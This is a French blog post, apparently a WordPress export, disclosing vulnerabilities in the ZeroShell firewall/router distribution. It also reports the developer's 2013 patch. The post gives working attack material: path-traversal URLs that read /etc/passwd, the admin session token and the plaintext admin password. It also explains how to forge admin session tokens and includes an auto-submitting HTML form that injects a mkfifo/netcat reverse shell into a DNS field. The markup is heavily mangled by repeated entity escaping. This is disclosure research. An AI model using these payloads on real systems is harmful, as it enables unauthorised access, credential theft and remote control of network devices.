![\"Zeroshell\"](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/Zeroshell.gif\")
<\/a><\/p>\nIntroduction<\/h2>\n
Dans la continuit\u00e9 des \u00e9valuations des routeurs\/firewall bas\u00e9s sur des distributions Linux et orient\u00e9s s\u00e9curit\u00e9, voici le tour de ZeroShell.<\/span><\/p>\n Zeroshell est une distribution Linux cr\u00e9\u00e9e dans le but d’\u00eatre tr\u00e8s compl\u00e8te con\u00e7ue pour fournir des services r\u00e9seaux s\u00e9curis\u00e9s dans un r\u00e9seau local. Elle a \u00e9t\u00e9 d\u00e9velopp\u00e9e par Fulvio Ricciardi pour \u00eatre totalement administrable via une interface web. Fournie sous forme de Live CD, elle s’initialise en ins\u00e9rant le CD dans la machine cible et en la red\u00e9marrant. La connexion \u00e0 l\u2019interface d\u2019administration se fait via un navigateur web pour ensuite configurer les services r\u00e9seaux.<\/p>\n<\/blockquote>\n Comme la plupart de ses cousines, ZeroShell offre un large panel de fonctionnalit\u00e9s, dont voici un extrait :<\/p>\n Je me suis bien \u00e9videmment int\u00e9ress\u00e9 \u00e0 cette distribution, son fonctionnement interne et sa potentielle s\u00e9curit\u00e9. Il en r\u00e9sulte qu’en quelques heures d’analyse, diverses vuln\u00e9rabilit\u00e9s peuvent \u00eatre exploit\u00e9e pour mettre \u00e0 mal le firewall\/routeur, et d’en prendre un contr\u00f4le total.<\/p>\n Toute la solution est administrable au travers d’une interface web. Ce WebGUI est en r\u00e9alit\u00e9 un fichier binaire du nom de “kerbynet”, interpr\u00e9t\u00e9 dans le r\u00e9pertoire “cgi-bin” du serveur apache. Ce fichier est localis\u00e9 en lecture seule ici :<\/p>\n [bash]\/cdrom\/usr\/local\/apache2\/cgi-bin\/kerbynet[\/bash]<\/p>\n L’ensemble des urls faites vers la WebGUI respecte la forme suivante :<\/p>\n [bash]http:\/\/&amp;amp;amp;amp;amp;amp;lt;ZEROSHELL_IP&amp;amp;amp;amp;amp;amp;gt;\/cgi-bin\/kerbynet?Section=&amp;amp;amp;amp;amp;amp;lt;SECTION&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;STk=&amp;amp;amp;amp;amp;amp;lt;SESSION_TOKEN&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;Action=&amp;amp;amp;amp;amp;amp;lt;ACTION&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;lt;PARAM&amp;amp;amp;amp;amp;amp;gt;=&amp;amp;amp;amp;amp;amp;lt;ADDITIONAL PARAM&amp;amp;amp;amp;amp;amp;gt;[\/bash]<\/p>\n Le fichier binaire “kerbynet” effectue un routage des param\u00e8tres GET\/POST vers des scripts d\u00e9di\u00e9s aux traitements \u00e0 r\u00e9aliser sur le firewall\/routeur. Ces scripts, qui sont pour la plupart des scripts sh, sont localis\u00e9s dans le r\u00e9pertoire :<\/p>\n [bash]\/root\/kerbynet.cgi\/scripts\/[\/bash]<\/p>\n Le WebGUI dispose \u00e9galement de fichiers “template”, centralis\u00e9s dans :<\/p>\n [bash]\/root\/kerbynet.cgi\/template\/[\/bash]<\/p>\n Toutes les op\u00e9rations d’administrations n\u00e9cessitent au pr\u00e9alable que l’utilisateur “admin” se soit authentifi\u00e9 sur l’interface. Ce compte “admin” peut \u00eatre utilis\u00e9 dans la WebGUI, en SSH ou en mode console. Une fois la connexion WebGUI d’\u00e9tablie avec ce compte, un jeton de session (token) est g\u00e9n\u00e9r\u00e9 et transite entre chaque page d’administration sans lequel les requ\u00eates ne peuvent aboutir.<\/p>\n Il y a toutefois quelques pages qui ne n\u00e9cessite pas de jeton de session, comme la page de la licence GPL du produit, ou encore l’acc\u00e8s aux certificats X.509.<\/p>\n L’ensemble du WebGUI tourne sous l’utilisateur “apache” qui s’av\u00e8re brid\u00e9 par rapport au compte root. Toutefois cet utilisateur dispose d’un grand nombre de privil\u00e8ge, puisqu’il acc\u00e8de notamment (lecture\/\u00e9criture\/ex\u00e9cution) aux fichiers de l’interface web se trouvant dans \/root. Un fichier recence toutes les commandes d’administration que l’utilisateur apache peut r\u00e9aliser (sudoers NO PASSWD) :<\/p>\n [bash]cat \/root\/kerbynet.cgi\/template.cfg\/sudoers[\/bash]<\/p>\n La plupart des scripts qui ex\u00e9cutent les t\u00e2ches d’administration par le biais du WebGUI ne sont pas prot\u00e9g\u00e9s quand \u00e0 l’injection arbitraire de commande. Dans la suite de cet article, seul un PoC d’ex\u00e9cution de commande arbitraire est d\u00e9taill\u00e9, mais la plupart des scripts sont vuln\u00e9rables de la m\u00eame mani\u00e8re. Les variables GET\/POST qui sont transf\u00e9r\u00e9es aux scripts ne sont pas convenablement nettoy\u00e9es.<\/p>\n Parmi les vuln\u00e9rabilit\u00e9s\u00a0d\u00e9cel\u00e9es\u00a0et qui sont pr\u00e9sent\u00e9es dans le PoC de cet article, on d\u00e9nombre :<\/p>\n La page “About” du produit se situe \u00e0 l’adresse suivante :<\/p>\n [bash]http:\/\/&amp;amp;amp;amp;amp;amp;lt;ZEROSHELL_IP&amp;amp;amp;amp;amp;amp;gt;\/cgi-bin\/kerbynet?Section=NoAuthREQ&amp;amp;amp;amp;amp;amp;amp;Action=Render&amp;amp;amp;amp;amp;amp;amp;Object=About[\/bash]<\/p>\n Cette url ne comportre aucun jeton de session, et peut donc \u00eatre consult\u00e9e sans authentification. Apr\u00e8s une recherche de la licence GPL sur le syst\u00e8me de fichier, celui-ci est stock\u00e9 dans :<\/p>\n [bash]\/root\/kerbynet.cgi\/template\/About[\/bash]<\/p>\n Il appara\u00eet nettement qu’une vuln\u00e9rabilit\u00e9 de lecture de fichier locaux est pr\u00e9sente :<\/p>\n [bash]http:\/\/&amp;amp;amp;amp;amp;amp;lt;ZEROSHELL_IP&amp;amp;amp;amp;amp;amp;gt;\/cgi-bin\/kerbynet?Section=NoAuthREQ&amp;amp;amp;amp;amp;amp;amp;Action=Render&amp;amp;amp;amp;amp;amp;amp;Object=..\/..\/..\/etc\/passwd[\/bash]<\/p>\n Zeroshell Local file disclosure<\/p><\/div>\n Comme dit pr\u00e9c\u00e9demment, toutes les op\u00e9rations d’administration de ZeroShell n\u00e9cessitent qu’une authentification au compte “admin” soit faite. Une fois connect\u00e9, un jeton de session transite entre chaque page pour valider les requ\u00eates. Ce jeton est stock\u00e9:<\/p>\n Je me suis par cons\u00e9quent plong\u00e9 dans le m\u00e9canisme interne du routeur\/firewall concernant la g\u00e9n\u00e9ration de ce jeton. Cette g\u00e9n\u00e9ration s’effectue dans divers scripts :<\/p>\n [bash]&amp;amp;amp;amp;amp;lt;\/p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt; Ce jeton de session est donc g\u00e9n\u00e9r\u00e9 \u00e0 partir de la fonction “rand”, qui retourne 8 chiffres al\u00e9atoires, et via le contenu du fichier “\/tmp\/STk_Admin”.\u00a0Ce fichier\u00a0“\/tmp\/STk_Admin” n’est cr\u00e9\u00e9 que si une connexion au compte “admin” via la WebGUI a d\u00e9j\u00e0 \u00e9t\u00e9 r\u00e9alis\u00e9e.<\/p>\n En exploitant la vuln\u00e9rabilit\u00e9 local file disclosure<\/em> d\u00e9taill\u00e9e pr\u00e9c\u00e9demment, il est possible de r\u00e9cup\u00e9rer le contenu de ce fichier :<\/p>\n [bash]http:\/\/&amp;amp;amp;amp;amp;amp;lt;ZEROSHELL_IP&amp;amp;amp;amp;amp;amp;gt;\/cgi-bin\/kerbynet?Section=NoAuthREQ&amp;amp;amp;amp;amp;amp;amp;Action=Render&amp;amp;amp;amp;amp;amp;amp;Object=..\/..\/..\/tmp\/STk_Admin[\/bash]<\/p>\n Zeroshell admin session token<\/p><\/div>\n Pour forger un hash de session d’administration valide (STk), il suffit de faire pr\u00e9c\u00e9der ce hash de 8 chiffres de votre choix :<\/p>\n [bash]13371337d5b4310596800b81c5a84a92287d2b13[\/bash]<\/p>\n Une fois ce hash g\u00e9n\u00e9r\u00e9, il est directement utilisable via les URLs suivantes pour acc\u00e9der aux pages d’administrations sans connaissance du mot de passe (ces pages sont normalement charg\u00e9es dans un frameset) :<\/p>\n [bash]http:\/\/&amp;amp;amp;amp;amp;amp;lt;ZEROSHELL_IP&amp;amp;amp;amp;amp;amp;gt;\/cgi-bin\/kerbynet?STk=&amp;amp;amp;amp;amp;amp;lt;GENERATED_SESSION_ID&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;Action=Render&amp;amp;amp;amp;amp;amp;amp;Object=sx[\/bash]<\/p>\n Acc\u00e8s au menu de gauche avec un jeton g\u00e9n\u00e9r\u00e9<\/p><\/div>\n [bash]http:\/\/&amp;amp;amp;amp;amp;amp;lt;ZEROSHELL_IP&amp;amp;amp;amp;amp;amp;gt;\/cgi-bin\/kerbynet?STk=&amp;amp;amp;amp;amp;amp;lt;GENERATED_SESSION_ID&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;Action=Render&amp;amp;amp;amp;amp;amp;amp;Object=utilities_menu[\/bash]<\/p>\n Acc\u00e8s au menu utilitaires avec un jeton g\u00e9n\u00e9r\u00e9<\/p><\/div>\n [bash]http:\/\/&amp;amp;amp;amp;amp;amp;lt;ZEROSHELL_IP&amp;amp;amp;amp;amp;amp;gt;\/cgi-bin\/kerbynet?STk=&amp;amp;amp;amp;amp;amp;lt;GENERATED_SESSION_ID&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;Action=Render&amp;amp;amp;amp;amp;amp;amp;Object=head[\/bash]<\/p>\n Acc\u00e8s au reboot\/shutdown avec un jeton g\u00e9n\u00e9r\u00e9<\/p><\/div>\n Pour cette \u00e9tape, il est n\u00e9cessaire qu’un jeton de session d’administration (g\u00e9n\u00e9r\u00e9 via la m\u00e9thode pr\u00e9c\u00e9dente ou non) soit en votre possession. Tous les formulaires HTML de l’interface WebGUI envoient en d\u00e9finitive leurs donn\u00e9es \u00e0 des scripts SH (via le binaire “kerbynet”). Ces donn\u00e9es ne sont h\u00e9las pas suffisamment valid\u00e9es et nettoy\u00e9es. Il est ainsi possible d’alt\u00e9rer l’ex\u00e9cution l\u00e9gitime des scripts avec des commandes arbitraires.<\/p>\n Dans l’exemple pr\u00e9sent, la commande arbitraire ex\u00e9cut\u00e9e sur la distribution est de lancer un netcat via une fifo pour obtenir un reverse-shell du c\u00f4t\u00e9 du pentester.<\/p>\n Le pentester commence par mettre son propre netcat en \u00e9coute :<\/p>\n [bash]nc -l -vv -p [PENTESTER_PORT][\/bash]<\/p>\n Puis, il suffit de lancer le script HTML suivant dans son navigateur, apr\u00e8s avoir \u00e9dit\u00e9 :<\/p>\n [html]&amp;amp;amp;amp;amp;lt;\/p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt; Reverse-shell sur ZeroShell<\/p><\/div>\n ZeroShell dispose nativement de netcat. Toutefois la version de nc pr\u00e9sente ne permet pas d’exploiter le flag -e ou -c, d’o\u00f9 l’utilisation d’un cha\u00eenage via mkfifo. Pour plus d’information quand \u00e0 l’utilisation et les variantes des commandes de reverse-shell, se r\u00e9f\u00e9rer \u00e0 l’article d\u00e9di\u00e9<\/a>.<\/p>\n Pour finir cette s\u00e9rie de probl\u00e8mes de s\u00e9curit\u00e9 qui ont \u00e9t\u00e9 identifi\u00e9s, il est possible de r\u00e9cup\u00e9rer en clair le mot de passe associ\u00e9 au compte “admin” de ZeroShell. Ce compte permet de se connecter en tant qu’administrateur au WebGUI ainsi qu’en root via SSH et\/ou console.<\/p>\n Le fait de disposer du mot de passe et donc d’un acc\u00e8s au WebGUI permet bien \u00e9videmment d’obtenir un jeton de session valide, afin d’\u00e9tablir un reverse-shell comme d\u00e9taill\u00e9 pr\u00e9c\u00e9demment.<\/p>\n Apr\u00e8s une br\u00e8ve analyse du m\u00e9canisme du WebGUI pour “changer le mot de passe d’administration”, il s’av\u00e8re que c’est le script suivant qui est appel\u00e9 :<\/p>\n [bash]\/root\/kerbynet.cgi\/scripts\/cpw[\/bash]<\/p>\n Dans le cas o\u00f9 le mode de changement de mot de passe est de “v\u00e9rifier le vieux password au pr\u00e9alable”, cette ligne du script est ex\u00e9cut\u00e9e :<\/p>\n [bash]if [ &amp;amp;amp;amp;amp;amp;quot;$CPW&amp;amp;amp;amp;amp;amp;quot; != &amp;amp;amp;amp;amp;amp;quot;`cat $REGISTER\/system\/ldap\/rootpw 2&amp;amp;amp;amp;amp;amp;gt;\/dev\/null`&amp;amp;amp;amp;amp;amp;quot; ] ; then[\/bash]<\/p>\n On peut facilement en d\u00e9duire que le mot de passe courant est stock\u00e9 dans “$REGISTER\/system\/ldap\/rootpw”, o\u00f9 “$REGISTER” vaut “\/var\/register” d’apr\u00e8s le fichier “\/etc\/kerbynet.conf”.<\/p>\n En cons\u00e9quence, on peut lire le contenu de ce fichier sans \u00eatre authentifi\u00e9 sur le routeur\/firewall via la vuln\u00e9rabilit\u00e9 de local file disclosure <\/em>d\u00e9taill\u00e9e <\/em>plus haut.<\/p>\n [bash]http:\/\/&amp;amp;amp;amp;amp;amp;lt;ZEROSHELL_IP&amp;amp;amp;amp;amp;amp;gt;\/cgi-bin\/kerbynet?Section=NoAuthREQ&amp;amp;amp;amp;amp;amp;amp;Action=Render&amp;amp;amp;amp;amp;amp;amp;Object=..\/..\/..\/var\/register\/system\/ldap\/rootpw[\/bash]<\/p>\n R\u00e9cup\u00e9ration du mot de passe administrateur en clair de ZeroShell<\/p><\/div>\n Une vid\u00e9o de d\u00e9monstration des diff\u00e9rents PoC a \u00e9t\u00e9 r\u00e9alis\u00e9e.<\/p>\n [youtube]https:\/\/www.youtube.com\/watch?v=fgbfVBr65e4[\/youtube]<\/p>\n Le d\u00e9veloppeur en charge de ZeroShell a \u00e9t\u00e9 alert\u00e9 le 20 mai 2013, et celui-ci a r\u00e9pondu tr\u00e8s aimablement le jour m\u00eame. Nous avons \u00e9chang\u00e9 quelques mails pour d\u00e9terminer les causes et techniques de protection \u00e0 appliquer. Le d\u00e9veloppeur m’a indiqu\u00e9 qu’une nouvelle release allait appara\u00eetre au d\u00e9but du mois suivant (juin). Fin juin je me suis permis de revenir aux nouvelles, la release est planifi\u00e9e pour d\u00e9but juillet. Finalement celle-ci vient tout juste de voir le jour<\/a>, d\u00e9but ao\u00fbt, o\u00f9 un patch correctif de s\u00e9curit\u00e9<\/a> est \u00e9galement disponible :<\/p>\n With the release 2.0.RC3 of Zeroshell some security issues have been corrected. Specifically, now the DNS works as cache and accepts recursive queries only for local networks if not configured otherwise. Recently, the DNS fully opened are being used to carry out DDoS attacks resulting in bandwidth consumption. For this reason, the migration to 2.0.RC3 is strongly recommended. Ce n’est h\u00e9las pas la distribution que je vais choisir mon s\u00e9curiser mon infrastructure interne, d\u00fb a ces quelques faiblesses relativement critiques. Non pas qu’elle soit incompl\u00e8te en termes de fonctionnalit\u00e9, mais l’aspect s\u00e9curit\u00e9 n’est pas\u00a0suffisamment\u00a0travaill\u00e9 \u00e0 mon sens. Je vous d\u00e9conseille son d\u00e9ploiement dans des environnements critiques en attendant qu’elle soit am\u00e9lior\u00e9e.<\/p>\n Je remercie Fulvio Ricciardi pour sa courtoisie et le travail qu’il semble r\u00e9aliser en solitaire sur cette distribution, et ce, depuis plusieurs ann\u00e9es. Je vous invite \u00e0 installer la RC3<\/a> ou \u00e0 d\u00e9ployer le dernier patch de s\u00e9curit\u00e9 du 07 ao\u00fbt 2013<\/a> pour r\u00e9duire le risque de vuln\u00e9rabilit\u00e9 de vos ZeroShell respectifs.<\/p>\n Pour finir, je finirai sur la petite touche humoristique du nom de cette distribution orient\u00e9e s\u00e9curit\u00e9, “ZeroShell”, par rapport \u00e0 cet article \ud83d\ude42 !<\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" Introduction Dans la continuit\u00e9 des \u00e9valuations des routeurs\/firewall bas\u00e9s sur des distributions Linux et orient\u00e9s s\u00e9curit\u00e9, voici le tour de […]<\/p>\n","protected":false},"author":1337,"featured_media":1130,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[59,517,165,516,14,515],"tags":[347,197,348,350,224,208,201,212,199,349,346],"class_list":["post-942","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administration-reseaux-et-systemes","category-csrf","category-os","category-rce","category-vuln-exploit-poc","category-xss","tag-admin-password-retrieval","tag-firewall","tag-jeton-de-session","tag-kerbynet","tag-mkfifo","tag-netcat","tag-remote-command-execution","tag-reverse-shell","tag-routeur","tag-session-token","tag-zeroshell"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/942","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=942"}],"version-history":[{"count":30,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/942\/revisions"}],"predecessor-version":[{"id":1605,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/942\/revisions\/1605"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1130"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=942"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=942"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=942"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\n
Fonctionnalit\u00e9s<\/h2>\n
\n
Analyse de la solution<\/h2>\n
Remarques g\u00e9n\u00e9rales<\/h3>\n
Liste des vuln\u00e9rabilit\u00e9s identifi\u00e9es<\/h3>\n
\n
Local File Disclosure<\/h3>\n
<\/a>G\u00e9n\u00e9ration du jeton de session d’administration<\/h3>\n
\n
\n&amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;gt;\/root\/kerbynet.cgi\/scripts\/net_showinterface:STk=&amp;amp;amp;amp;amp;amp;quot;`rand“cat \/tmp\/STk_Admin 2&amp;amp;amp;amp;amp;amp;gt;\/dev\/null`&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n\/root\/kerbynet.cgi\/scripts\/qos_showinterface:STk=&amp;amp;amp;amp;amp;amp;quot;`rand“cat \/tmp\/STk_Admin 2&amp;amp;amp;amp;amp;amp;gt;\/dev\/null`&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n\/root\/kerbynet.cgi\/scripts\/vpn_list:STk=&amp;amp;amp;amp;amp;amp;quot;`rand“cat \/tmp\/STk_Admin 2&amp;amp;amp;amp;amp;amp;gt;\/dev\/null`&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n\/root\/kerbynet.cgi\/scripts\/net_list:STk=&amp;amp;amp;amp;amp;amp;quot;`rand“cat \/tmp\/STk_Admin 2&amp;amp;amp;amp;amp;amp;gt;\/dev\/null`&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n\/root\/kerbynet.cgi\/scripts\/qos_list:STk=&amp;amp;amp;amp;amp;amp;quot;`rand“cat \/tmp\/STk_Admin 2&amp;amp;amp;amp;amp;amp;gt;\/dev\/null`&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n\/root\/kerbynet.cgi\/scripts\/storage_netDB:STk=&amp;amp;amp;amp;amp;amp;quot;`rand“cat \/tmp\/STk_Admin 2&amp;amp;amp;amp;amp;amp;gt;\/dev\/null`&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;lt;\/p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n&amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;gt;[\/bash]<\/p>\n<\/a>Menu de gauche<\/h4>\n
<\/a>Menu d’utilitaires<\/h4>\n
<\/a>Menu d’en-t\u00eate<\/h4>\n
<\/a>Remote Command Execution – Reverse-shell<\/h3>\n
\n
\n&amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;lt;html&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;body&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;form name=’x’ action=’http:\/\/[ZEROSHELL_IP]\/cgi-bin\/kerbynet’ method=’post’&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;input type=’hidden’ name=’Action’ value=’Lookup’ \/&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;input type=’hidden’ name=’STk’ value='[GENERATED_SESSION_ID]’ \/&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;input type=’hidden’ name=’Section’ value=’DNS’ \/&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;input type=’hidden’ name=’What’ value=’yanncam&amp;amp;amp;amp;amp;amp;quot; localhost &amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp; rm -f \/tmp\/x;mkfifo \/tmp\/x;cat \/tmp\/x|\/bin\/sh -i 2&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;amp;1|nc [PENTESTER_IP] [PENTESTER_PORT] &amp;amp;amp;amp;amp;amp;gt; \/tmp\/x #’ \/&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;input type=’hidden’ name=’DNS’ value=’localhost’ \/&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;\/form&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;script&amp;amp;amp;amp;amp;amp;gt;document.forms[‘x’].submit();&amp;amp;amp;amp;amp;amp;lt;\/script&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n &amp;amp;amp;amp;amp;amp;lt;\/body&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n&amp;amp;amp;amp;amp;amp;lt;\/html&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;\/p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;
\n&amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;gt;[\/html]<\/p>\n<\/a>Admin password retrieval<\/h3>\n
<\/a>Vid\u00e9o PoC de d\u00e9monstration<\/h3>\n
Conclusion et notes de fin<\/h2>\n
\n
\nNo-IP has been added as a provider for dynamic DNS and the recognition of 3G USB modems has been enhanced. You can now disable the virus scan of web pages resulting in improved performance of the transparent proxy on modest hardware.
\nSeveral fixes have been applied on the procedure for Backup and Restore of the profiles.<\/p>\n<\/blockquote>\nSources & ressources<\/h2>\n
\n